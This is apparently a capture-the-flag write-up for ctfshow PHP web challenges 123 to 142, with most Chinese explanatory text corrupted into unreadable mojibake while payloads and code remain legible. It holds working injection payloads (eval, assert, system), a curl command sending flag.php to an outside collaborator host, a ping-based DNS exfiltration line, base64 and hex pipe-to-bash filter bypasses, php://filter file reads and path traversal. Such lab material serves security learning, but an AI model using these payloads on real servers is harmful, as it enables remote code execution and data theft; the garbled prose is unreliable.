5. post��CTF_SHOW=&CTF[SHOW.COM=&fun=eval(urldecode($a[0]))
˼·��ֱ��payload2��
1. post��CTF_SHOW=&CTF[SHOW.COM=&fun=echo $flag
˼·��ȫ�ֱ��(��ۿ��У�ʵ��)
1. post��CTF_SHOW=&CTF[SHOW.COM=&fun=var_export($GLOBALS)
Ԥ�ڽ⣺
1. post�� CTF_SHOW=&CTF[SHOW.COM=&fun=parse_str($a[1])
2. get��a=1+fl0g=flag_give_me(��Ҫʹ�÷ֺ�)

php��Բ��֪ʶ��

PHP��Ӧ��ֻ��ĸ�»��,ͬʱGET��POST��ʽ��ȥ�ı��,��Զ��ո�+��.��[ת��Ϊ_��butֻ�滻һ��
1. ��һ��Կ��ƹ�,ʹ��.֮��ģ�GET��POST��ʽ��ʱ,��е�[Ҳ�ᱻ�滻Ϊ_,��ַ��Ͳ��ᱻ�滻
2. ˵�� GET �� POST ��д��ʱ��PHP ��Զ��Щ�ַ��滻
3. ԭ��PHP�У�”[��͡�]��ڷ��Ԫ�ء��а��[��ʱ��PHP�Ὣ��滻Ϊ�»��ߣ��ǡ�[“��ַ��ᱻ�滻��ΪPHP��Ϊ��һ��Է��Ԫ�صĲ��

��ϵ��ʵ�ǿ��ͨ��fuzz��

<?php
function curl($url,$data){
   $ch = curl_init(); 
   curl_setopt($ch, CURLOPT_URL, $url);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt($ch, CURLOPT_POST, 1);
   curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
   $response = curl_exec($ch);
   curl_close($ch);
   return strlen($response);
}
$url="http://127.0.0.1/test.php";
for ($i=0; $i <=128 ; $i++) { 
   for ($j=0; $j <=128 ; $j++) {
      $data="CTF".urlencode(chr($i))."SHOW".urlencode(chr($j))."COM"."=123";
      if(curl($url,$data)!=0){
         echo $data."\n"; 
      }
   }
}

//test.php�е�����
<?php
if(isset($_POST['CTF_SHOW.COM'])){
   echo 123;
}

$_SERVER[‘argv’]֪ʶ��
1. ��ʹ��(��0��ʼ)��ȡ��ֵ��$_SERVER[‘argv’][1]��û�м��
2. cli��ģʽ�£��һ��$_SERVER[‘argv’][0]�ǽű��Ǵ��ݸ��ű��Ĳ��
3. web��ҳģʽ�£�
  1. ��webҳģʽ�±��php.ini��register_argc_argv�� ��register_argc_argv = On(Ĭ��Off)��$_SERVER[��argv��]�Ż��Ч��
  2. $_SERVER[��argv��][0] = $_SERVER[��QUERY_STRING��]
  3. $_SERVER[‘QUERY_STRING’] ��һ�� PHP ��ȫ��е�Ԫ�أ��ڻ�ȡ��ǰ URL �еĲ�ѯ�ַ��֡��ѯ�ַ�� URL ��ʺ� ? ֮��Ĳ��(��?��)��ͨ�� GET ��ݸ��ű��Ĳ��
4. web��ҳģʽ�¿��[0]��url��but��룬ʹ�õĻ��Ҫurldecode()��
5. $argv,$argc��webģʽ�²��
  1
  2
  3
  4
  url..../?$flag="give_me_flag";
  
  echo $_SERVER['argv'][0];
  //��$flag=%22give_me_flag%22;
Ԥ�ڽ�˵��
1. parse_str()��
  1. ��ԭ�ͣ�void parse_str ( string $encoded_string [, array &$result ] )
  2. $encoded_string��Ҫ��Ĳ�ѯ�ַ��
  3. $result��ѡ��ı��洢�ڴ��
  4. ��ã��һ��ı��Ĺ��飬��䷵��/��
  5. ��extract()��֮��
2. $_SERVER[‘argv’]֪ʶ�㲹�䣺��ҳģʽʹ��+�Ž��
  1. CLIģʽ��ֱ�Ӱ� request info ??��argvֵ��Ƶ�arr��ȥ
  2. ��ж�query string�Ƿ�Ϊ��
  3. ��Ϊ�հ�ͨ��+��ŷָ��ַ��ת��php�ڲ��zend_string
  4. Ȼ��ٰ��zend_string��Ƶ� arr ��ȥ

web125(ͬweb123+�ؼ��ʹ��)

��

��һ��Ӧʹ��Ƕ��ƹ�
payload1��
1. post��CTF_SHOW=&CTF[SHOW.COM=&fun=highlight_file($_GET[1])
2. get��?1=flag.php
payload2��
1. post��CTF_SHOW=&CTF[SHOW.COM=&fun=readgzfile($_GET[1])
2. get��?1=flag.php
payload3(ͬweb123)��
1. post��CTF_SHOW=&CTF[SHOW.COM=&fun=parse_str($a[1])
2. get��?a=1+fl0g=flag_give_me

php��Բ��֪ʶ��

˼·��CTF_SHOW=&CTF[SHOW.COM=&fun=extract($_POST)&f10g=flag_give_meΪʲô��
˼·2��CTF_SHOW=&CTF[SHOW.COM=&fun=system($_POST[1])&1=lsΪʲô��
��˼ά��ȡ

web126(ͬweb125)

��

ʹ�ñ��ȡ��ߴ��ִ�н��ƹ�
payload1(��ȡ)��
1. post��CTF_SHOW=&CTF[SHOW.COM=&fun=parse_str($a[1])
2. get��?a=1+fl0g=flag_give_me
payload2��
1. post��CTF_SHOW=&CTF[SHOW.COM=&fun=eval($a[0])
2. get��$fl0g=flag_give_me;
payload3(assert)��
1. post��CTF_SHOW=6&CTF[SHOW.COM=6&fun=assert($a[0])
2. get��?$fl0g=flag_give_me

php��Բ��֪ʶ��

assert
1. php5��bool assert ( mixed $assertion [, string $description ] )
2. php7��bool assert ( mixed $assertion [, Throwable $exception ] )
3. �� assertion ��ַ��ᱻ assert() �� PHP ��ִ��eval��ֻ��assert��Ҫ�ϸ��﷨��ĩβ�ķֺſɲ��
$_REQUEST��
1. $_REQUEST: $_REQUEST ��һ�� $_GET��$_POST �� $_COOKIE ��顣��ռ�HTML��ύ��
2. $_REQUEST��յ��get��Ϊ��psot��cookie�ȡ��ô��get��һ��a,postҲ��һ��a��ô$_REQUEST[a] ��˭��ֵ�ء��ȡ��php.ini�е�variables_order��ã�Ĭ��Ϊ��
  1
  variables_order = "GPCS"

web127($_SERVER[‘QUERY_STRING’])

��

��һ�γ��ʹ��+�ű�Ϊ��preg_match��ƹ��butʧ��ˣ��web125��Ӧ��$_SERVER[‘argv’]�ſ��ʹ��+�ţ��$_SERVER[‘QUERY_STRING’]��ȡ�ַ��
��ˣ��һ��$_SERVER[‘QUERY_STRING’]��üһ��ǲ��url��ˣ��ֵ�֪$_GET�ǻ��ģ��ǲ�ˬ�ˣ�ֱ��ƹ�waf��
payload��?ctf%5fshow=ilove36d
payload2��?ctf show=ilove36d
1. ��õ�125�е��ˣ��ո�Ҳ��(+�ž��һ��)

php��Բ��֪ʶ��

$_SERVER[‘QUERY_STRING’] ��ֵ��ʲô��ʵ��ǻ�ȡ��ȡ��url��ֵ��?��ַ��
1. �ƹ�waf��ֱ�ӽ��н��˵��ַ��URLencode ��Ϊ $_SERVER[‘QUERY_STRING’]��ȡ��ֵ��URLDecode
2. but$_GET��$_POST��url��

��Կ�fuzz?

<?php
function waf($num){
   if(preg_match('/\`|\~|\!|\@|\#|\^|\*|\(|\)|\\$|\_|\-|\+|\{|\;|\:|\[|\]|\}|\'|\"|\<|\,|\>|\.|\\\|\//', $num)){
      return false;
   }else{
      return true;
   }
}
for($i = 0; $i<129; $i++){
   $num=chr($i);
   if(waf($num)){
      echo "δ���룺".$num."   �������룺".urlencode(chr($i))."\n";
   }
}
//���Ա�url��û��urlencode�Ķ���һ��
?>

web128(��ĸrce)

��

��ӿ��ʹ��rce��but��ﻹ��ᣬ��һ��wp��üһֱ�Ӹ��
payload��?f1=_&f2=get_defined_vars
1. ʹ��_()��ȡ�ַ��ͨ��һ��ص��
2. ʹ��get_defined_vars��ȡȫ��㱾��Ӧ��뵽�ģ��£��̫��

php��֪ʶ�㲹��

call_user_func()
1. ��ԭ�ͣ�call_user_func(callable $callback [, $parameter [, …]])
2. $callback��衣Ҫ��õĻص��һ��ַ��ʾ��Ҳ��һ��ͷ��飬��һ��
3. $parameter��ѡ��Ҫ��ݸ��ص��Ĳ��ж��
gettext()
1. ��ԭ�ͣ�string gettext ( string $message )
2. ��_() ��ͨ�� gettext() ��ı��
3. ��ã��ڴӷ��ļ��л�ȡ��ַ��з��򷵻ش��string
4. ��벽�裺
  1. ��Ի��ȣ�ʹ�� setlocale() ��Ի�� PHP ��֪��Ҫ��ĸ��Ի��ķ��ļ��л�ȡ��ַ��
  2. ��ط��ļ��ʹ�� bindtextdomain() �� textdomain() ��ط��ļ�
  3. ��ȡ��ַ��ʹ�� gettext() ��ȡ��ַ��
��function_alias() ��Ϊ��еĺ��㽫һ��ָ��Ϊ��һ��ı��ñ��ʱʵ��ǵ��ԭʼ��
��û��ֵĺ��ڴ��ֱ�Ӷ��ʹ�ã�ͨ��ڴ��ݸ��򷽷��Ϊ�ص��ʹ��
1
2
3
4
5
6
7
8
<?php
// ��岢��
$addition = function($a, $b) {
return $a + $b;
};

echo $addition(3, 4); // ��: 7
?>
˼·��ʹ��?
1. ��ԣ�//var_dump(call_user_func(call_user_func(function($c){ echo $c;},’hcl’)));��ѣ��ǻ��hcl��
2. �¸�phpstorm��ɣ��Ժ�ᾭ��õ�

web129(strpos)

��

payload1��f=php://filter/read=convert.base64-encode|ctfshow/resource=flag.php��?f=php://filter/|ctfshow/resource=flag.php
1. phpαЭ��п��Լ��ݵģ�ʹ��|�ָ��û��Ҳ��Ӱ�죬php��û�е�filter�ͻ��
payload2��Զ��ļ��Լ��ķ��д��һ�仰��Ȼ�󱣴�Ϊtxt�ĵ�� f=http://url/xxx.txt?ctfshow
��xxx.txtΪһ�仰
payload3��/ctfshow/../var/www/html/flag.php��./ctfshow/../flag.php
1. Ŀ¼��Խ

PHP��֪ʶ�㲹��

strpos()�ƹ�
1. ʹ��%0a��ƹ�
2. ��鷵��null��null !== false��null !== 0��null > 0 ��false

web130(strpos===false)

��

��129��Ի�130
payload��f[]=
1. ʹ��ƹ��preg_match��false��strpos��null

web131(preg_match��ݴ��)

��

ʹ��python�ű��web131�е�pycharm

php��Բ��֪ʶ��

PHP Ϊ�˷�ֹһ��ƥ��õ�ƥ��̹��Ӷ��ɹ��Դ��ģ��ֹ��ʽ�ľܾ��񹥻��reDOS�� pcre �趨��һ��ݴ�� pcre.backtrack_limit
��ݴ��Ĭ�� 100 ��ݴ�� 100 ��preg_match ��ٷ��ط� 1 �� 0�� false
1. ע��ǻ��ݵ��޶��ޣ��̰��ģʽ�ͷ�̰��ģʽ
2. ��ݲ��”��ݴ��” ָ��ʽ��波��ƥ��һ��ַ��ʱ��ִ�еĻ��ݲ��Ĵ��ָ��ƥ��г��Բ�ͬ��ƥ�䷽ʽ��ֱ��ҵ��ƥ��Ľ��ƥ��ʧ��
3. ��̰��ģʽ�£��ַ��ֱ�ƥ�䣬��벿��ûƥ��ȫ��ƥ�䡰��Ҫͨ��ƥ��һ��ĳ��ȣ��ڳ��*?��+?ʱ��ײ��
4. ̰��ģʽ�£�pattern��ֱ�ƥ�䣬��Ǻ�벿��ûƥ�䣨ƥ�䡰��͡��Ѻ��Ĳ��Ҳƥ��ˣ�ʱƥ��ʽ��˵Ĳ��ڳ��*��+ʱ��ײ��
ʹ��python�ű��pycharm�е�web131
˼·��ţ��ƹ�ƥ�䲻һ��Ҫ��ƹ��һ��ƹ��һ��
if(0 === flase)��ֵΪfalse0��ǿ��false��

web132(&&��||��ȼ�)

��

��һ��Ҫ��Ϣ�Ѽ��һ��robots.txt
��뿴��˺��ûɶ��ֱ�Ӵ��
payload��?username=admin&code=admin&password=1

php��Բ��֪ʶ��

��ڡ��롱��&&�� 㣺 x && y ��xΪfalseʱ��ֱ��ִ��y�� ڡ��򡱣�||�� x||y ��xΪtrueʱ��ֱ��ִ��y
1. ��ڱܿ�ĳЩ��ǿ�Ƹ�ֵ��
��ɨ��Ŀ¼ʹ��
mt_rand()��α��̶ֹ��ɷ�Χ�ڵ��
1. ��Сֵ��ӣ��Զ��Լ��

web133(��޻��rce+��+dns_bp��)

��

��дһ��Ԥ�ڽ⣬��¼��ִ��ƹ�3��
��⿼��ʹ�ñ��ǡ��ǰ6��ĸ��ִ��Լ��eval��?F=`$F`;+…(�ո��url��ʾ)��ִ��ʱִ��$f��Ͼ��ı��
��Ҳ�ͱ��``$F`…��`��ֿ��ƹ��ƣ��Ҳ�պñպ�
��ƴ�ӣ�curl -X POST -F xx=@flag.php url
1. ��xx��ϴ��ļ��nameֵ
2. ��flag�ļ��ϴ��Burp�� Collaborator Client �� Collaborator Client ��DNSLOG��书��Ҫ��DNSLOGǿ��Ҫ��ڿ��Բ鿴 POST��Լ��Cookies��
��bp��url
payload��?F=`$F` ;curl -X POST -F xx=@flag.php http://qzt0w7p0lopb1kgs88jdkwbqghm9a2yr.oastify.com
1. �޷�ʹ��ls��because�޻��
2. ʹ��burp��collaborator��http://��ֱ��ɵ��Ϳ��
3. ls>txt��Ϊû��д��Ȩ�ޣ�ֻ�ܽ��

php��Բ��֪ʶ��

��

���Ǵ���?F=`$F`;+sleep 3������վȷʵsleep��һ��˵����ȷִ��������
**��Ϊʲô��������**
��Ϊ�����Ǵ��ݵ�`$F`;+sleep 3���Ƚ���substr()�����ض�Ȼ��ȥִ��eval()����
���������������ִ��php���룬``��shell_exec()��������д��Ȼ���ȥ����ִ�С�
��$F�������������`$F`;+sleep 3 ʹ�����ִ�еĴ���Ӧ����
``$F`;+sleep 3`,��ִ�гɹ�
��������е��ƣ���������

��⣺

curl��

curl ��һ��½��紫��Ĺ��ߣ�֧�ֶ��Э�飬�� HTTP��HTTPS��FTP �ȡ��ڴ��л�ȡ��ݣ��ģ��Ϊ��
��﷨��curl [options] [URL]
1. -X��ָ��󷽷�
2. -H��ͷ
3. -d��ָ��Ҫ��͵��
4. -o��ָ��ļ�
5. -u��ָ��û��֤
6. -k��ȫ�� SSL ��
7. -v��ʾ��ϸ��Ӧ��Ϣ

ʹ��

// 1. ����get����
curl http://example.com?...

// 2. ����post����
curl -X POST -d "param1=value1&param2=value2" http://example.com

// 3. �����ļ�
curl -o filename.txt http://example.com/file.txt
# ��ָ��url�������ļ������ļ����浽��ǰ����Ŀ¼�µ�filename.txt

// 4. �ϴ��ļ�
curl -F "file=@localfile.txt" http://example.com/upload
# �ϴ������ļ�localfile.txt��http://example.com/upload
# @ ��������ָ��Ҫ�ϴ����ļ����ڷ��� POST ����ʱ��Ҫ��ָ�����ļ�������Ϊ�������һ�����ϴ���������

curl -F "file1=@localfile1.txt" -F "file2=@localfile2.txt" http://example.com/upload
# ����ͬʱ�ϴ�����ļ���ͨ�����ʹ��-F

curl --form "fieldname=@filename" URL
# ���µ� cURL �汾�У�Ϊ����߰�ȫ�ԣ���Ҫ��ʹ�� @ �����ϴ��ļ�ʱ������ʽ����
#ʹ�� --form ѡ�������� -F ѡ�����Ҫ @ ����

web134(��+parse_str+extract)

��

ʹ�ñ��ǣ��һ��Ҫʹ�õ��ȡ��extract��ȡ��飬��parse_str��ȡ��Ͻṹ��ַ��
��ʹ��parse_str��_POST��ʹ��extract��ȡ
payload��?_POST[key1]=36d&_POST[key2]=36d

php��Բ��֪ʶ��

ʹ��?%20key1=36d&%20key2=36dΪʲô��У�û��nono��php��Ҳ�е�ͨ
1. parse_str()��Զ��url��룬��Ҳ��һ�ν��룬��$_SERVER[‘QUERY_STRING’]��url��
2. php��ϱ��ɣ��ô�㶼��
Ϊʲô?_POST[‘key1’]=36d&_POST[‘key2’]=36d�Ͳ��ԣ�ȥ��žͿ��
��post�д��test[‘key1’]=36d&test[‘key2’]=36d�ǲ��е�
1. ��൱��post��д��һ��test��飬extract��ȡ��ʱ_POST�Ѿ��һ��
2. wp��get��д��һ��Ϊpost��飬��ⲿpost��鲻��һ��but��ȡ��ⲿpost��һ��ˣ��Ⱥ��𣬿��ƹ�isset
3. ��ϣ�extract��parse_str��ʹ��
��ʹ��[��ǲ��ǰ��һ��Խ��Ϊ_��Ϊ��ת��
php�ַ��
1. php��в��ת��Ϊ��Ч�ı��ʱ��н��Ϊ��
2. step1��ɾ��ǰ��Ŀհ׷��ո��Ʊ��з��ͳ��Ϊ�հ׷��
3. step2��ĳЩ�ַ�ת��Ϊ�»��ߣ��ո�

web135(web133��ǿ+д��Ȩ��)

��

��Ȳ�һ��û��д��Ȩ�ޣ��еĻ��򵥺ö࣬ȷʵ��һ��ֱ�ӳ�flag
payload��?F=`$F` ;nl flag.php > 1.txt | sleep 1��1.txt
payload2��ping `cat flag.php|awk ‘NR==2’`.6x1sys.dnslog.cn
1. linux��ʹ�÷�� ` �� $()��ִ��Ƽ��ķ��ִ��е����Ϊ�ַ��뵽��(��滻)
2. awk�е�NR��NR ��һ��õı��ڱ�ʾ��ǰ��ڴ��кţ��¼��У�Ҳ��ʹ��ģʽƥ��
  1. NR ��ֵ��ÿ�ζ�ȡ�µ��ʱ�Զ��ڴ��ļ�ʱ��NR ��ÿ��ļ��ļ�¼��Ӱ��

rce��֪ʶ��

�ض��ʹ��>��mv(��)��cp��tee�ȣ��෽��˼��
ICMP��Internet ��ϢЭ�飨Internet Control Message Protocol��
1. ��λ��ã�� TCP/IP Э��ջ�е�һ��ҪЭ�飬�� IP ��д��ݿ��Ϣ�ʹ��󱨸�
  1. ��󱨸棺�� IP ��ݰ��ڴ��з��ʱ��Ŀ�겻�ɴ��ʱ�ȣ�ICMP ��Դ��ʹ��󱨸�
  2. ��̽�⣺ICMP ��ִ��̽�⣬��ͨ�� ICMP ��Ping ��֮��ͨ��
  3. ·��ͨ�棺·��ʹ�� ICMP ��Ϣ��ͨ��е�·��Ϣ
ping��
1. ��Լ��ڵ�֮��Ŀɴ��Լ��ʱ�䣨RTT��
2. ��̣�ͨ��Ŀ��ڵ㷢�� ICMP��Internet Control Message Protocol��Echo Request��ȴ�Ŀ��ڵ㷵�� ICMP ��Իظ��Echo Reply��ʵ��һĿ��
3. �﷨��ping [ѡ��] Ŀ��ַ
  1. -c count��ָ�� ICMP ��ֹͣ
  2. -t timeout��ó�ʱʱ��
  3. -i interval��÷�� ICMP ��ʱ��
awk��
1. ��ã��û��һ��ı��д��ͷ��Ӧ�Ĳ��Ĳ��ָ��ֶΡ��ֶν��м��㡢��ʽ��
2. �﷨��awk ‘pattern { action }’ filename
  1. pattern ָ��ƥ��ʽ��ģʽ
  2. action ָ��ƥ��µĲ��Ǵ�ӡ��㡢��ֵ

web136(�޻��rce+�ض��)

��

ʹ��tee���ؼ��չ��Է��͵��׼��
payload��ls | tee file | sleep 1�ɹ�ִ�к��ʣ��û��flag.php��Ȼ��ls / | tee file | sleep 1��ˣ�ʹ��tac /f149_15_h3r3 | tee file��cat��
1. Ϊʲôʹ��tac��Ľ��û�з�ת

��ִ�в��֪ʶ��

php�е�exec()
1. ִ��ϵͳ����string
2. ��һ��ݣ��Զ��͵��׼��޻��Ե��ִ�к��
3. shell_exec()��php��Ҳ��ͨ��``��е��ã�ͬexec()��һ��Ὣ��͵��׼��

tee��

tee ��һ��õ� Linux ����Ҫ��Ǵӱ�׼��ж�ȡ��ݣ��ͬʱ��׼��һ��ļ��(ע��)

�﷨��tee [ѡ��]… [�ļ�]

-a��׷��ģʽ��׷�ӵ��ļ�ĩβ��Ǹ��ļ��
-i��д��󣬼��ִ�м�ʹ�ļ��޷�д��
-p��ж��ļ��ݵ��ļ��һ��

tee - 
//�������׼�������

tee - - 
//�������׼�������

tee file1 file2 -
//�������׼�������,��д���������ļ���

ls ��*�� 2>&1 | tee ls.txt
//�ѱ�׼����Ҳ��tee��ȡ

��ض��
1. &>��ı�׼��ͱ�׼��ض��ͬһ��ļ��
2. 2>��ı�׼��ض��ļ��
3. 2>&1��ı�׼��ض��򵽱�׼��
��д��Ȩ�ޣ��д��ɲ鿴��ļ��ܺ�
1. �ؼ��ʣ��Խ�һ��ļ��͵��һ�ļ��
2. �ؼ��ʣ��ض��ļ��

web137(call_user_func��෽��)

��

payload��ctfshow=ctfshow::getFlag
payload2��ctfshow[]=ctfshow&ctfshow[]=getFlag
1. ��ctfshow[ctfshow]=getFlag��Ǽ�ֵ

��֪ʶ�㲹��

call_user_func()��෽��

// 1. ���þ�̬����
call_user_func(array($classname,$funcname));
call_user_func("$classname::$funcname");
call_user_func(array($object,$funcname)); 
# �Ǿ�̬��������ԣ�butǰ���ֶԷǾ�̬ PHP 7.2 �汾���ѱ�����

php�� ->��:: ��еĳ�Ա��
1. ->��ڶ�̬�ﾳ��ĳ��ĳ��ʵ��
2. ::��Ե��һ��̬�ġ��ʼ��෽��

web138(ͬ137)

��

payload��ctfshow[]=ctfshow&ctfshow[]=getFlag
1. ��Ҫ�鿴Դ��ſ��ԣ�Ϊʲô��ֱ��ʾ��

web139(��136+��д��Ȩ��)

��
rce��֪ʶ��

��д��Ȩ�޵��ִ��(linux)
1. >��
2. tee��
3. �ض��
4. dd
  1. ��ã��ת��͸��ƣ��ɴӱ�׼��ļ��ж�ȡ��ݣ��ָ��ĸ�ʽ��ת��ݣ��ļ��豸��׼��
  2. ��﷨��dd [ѡ��]
    1. if=��ļ��ָ��ļ��·��ָ�� dd Ĭ�ϴӱ�׼��ȡ��:dd if=input_file.txt
    2. of=��ļ��ָ��ļ��·��ָ�� dd Ĭ�Ͻ��д��׼��:dd of=1.txt
    3. ��ѡ��chat
5. cp
6. rm
7. awk
��ƹ��ؼ��ʷ��(web139��)
1. ǰ�᣺bash��sh��޷��ƹ��ģ��˾Ͳ�̫��
2. payload1��ʹ��base64��echo “…” | base64 -d | bash
3. payload2��ʹ��hex��룺echo “..” | xxd -r | bash
4. pyaload3��ʹ��hex��:
  $(printf”\x63\x61\x74\x20\x2e\x2f\x31\x2e\x74\x78\x74”)
  1. $() ��һ��滻,��ִ��һ����Ϊ��һ��Ĳ��
5. ��ʹ��shell��ֻ��ַ��ִ��

web140(��Ƕ�׷��ֵ0/1)

��

�Ӻ��ǰ��ctfshow��Ϊint�Ļ��0��intval��ֱ�Ӵ�0��ߴ��false
f1��f2��Ҫ��Сд��ĸ��֣��ͷ��β��ζ�Ų��ʹ��_�ĺ��
��ֵΪ0��ʹ��systemǶ��dirnameʹ�ã�systemʧ�ܷ��false��dirnameʧ�ܷ��’’(��ַ��)��intval�˾ͺ�
payload��post��f1=system&f2=dirname
1. ��preg_match��ʹ��f1=system&f2=get_defined_vars
payload2��post��f1=usleep&f2=usleep
1. usleep��ǰ�ű��ָ��΢��֮һ�룩��ͣ�ű��ִ��һ��ʱ�䣬��ɹ��򷵻� true��򷵻� false
2. ��ʹ��Ϊ��intval��
payload3��post��f1=getdate&f2=getdate
1. getdate() ��һ�� PHP ��ú��ڻ�ȡ��ǰʱ��ϸ��Ϣ��Թ��ʽ��أ�ʧ�ܷ��false
��payload
1. md5(phpinfo())
2. md5(sleep())
3. md5(md5())
4. current(localeconv)
5. sha1(getcwd())��Ϊ/var/www/html md5��ͷ��Ǹ��sha1

php��Բ��֪ʶ��

��Ƚ��
1. false == 0
2. false != ‘0’
3. 0 == ‘ctfshow’
4. false != ‘ctfshow’
5. false��ַ��ǻὫfalse��Ϊ’’��ַ��
6. ==��д��
intval��䣺intval(false)===0
php�к��Ʋ��ִ�Сд��strlen��StrlEn��һ��õ�
1. ��ڱ��ͳ��д�Сд��е�
Ҫʹsystem��false
1. ��ַ��޷�ִ�У��system(dirname())
2. ��ݿ��ǲ��ֵbut�޷�ִ�У��system(system())��false
��warning��error��php�ű��һ��
1. ��Fatal Error��ڻ��ߺ��õķ�ʽ��ȷ��糢�Ե��δ��ĺ��
2. ��Parse Error��õ��﷨��δƥ�䣬��ᵼ�� PHP ��󣬲�ִֹͣ�нű�
3. һ��ô��warning�Ӷ�

web141(ȡ��ƹ�+��ĸrce)

��

��ֱ��ͨ��ȡ��ƹ��Լ��ȡ��ɣ�(A)==A

ʹ��php�ű��ֱ�ӽ��ȡ��urlencode��

$func1 = "system";
$param = "(\"ls\")";
$func1 = urlencode(~$func1);
$param = urlencode(~$param);
echo "Encode result is:\n~$func1~$param";

php��Բ��֪ʶ��

php��ֺ��ǿ��һ��ִ��ģ��1+phpinfo()+1;�ǿ��ʾphpinfoҳ��
1. ��Ƿֿ��еģ��ʹ��var_dump(1+var_dump(“html”)+1)��tring(4) “html” int(2)��ᱨ��
php��ȡ��evalʱ��ִ�У��Կ��ƹ�
ȡ��д��+-д��
1. ~~$func1~~$param��У�~~$func1.~~$param��
2. ~~$func1.~~$param-�ᱨ��ʹ��Ų��
3. ��Ҫ��~~��(~~$func1)(~$param)��Բ�ʹ��.��

web142(��ӣ�)

��

��Ѷ�0��0�ͺ��
payload��?v1=0Ȼ��鿴Դ�뼴��
payload2��?v1=0e234��ѧ��
payload3��?v1=0x0
1. ��ʽphp5��is_numeric()��֧��ʮ��

Q&A

web89(intval����)

web90(intval+ǿ�Ƚ�)

web91(�������ʽ���η�)

web92(intval+���Ƚ�)

web93(ͬweb92)

web94(strpos()+ǿ�Ƚ�)

web95(ͬweb94+.����)

web96($_GET[]�Ƚ�+highlight_file)

web97(md5ǿ�Ƚ�)

web98(http����ͷ)

web99(ľ��/rce�ַ���д��+���Ƚ�)

web100(��������ȼ�)

web101(web100+����)

web102(�����ص�)

web103(ͬweb102)

web104(sha1���)

web105(��������)

web106(��web104+sha1���Ƚ�)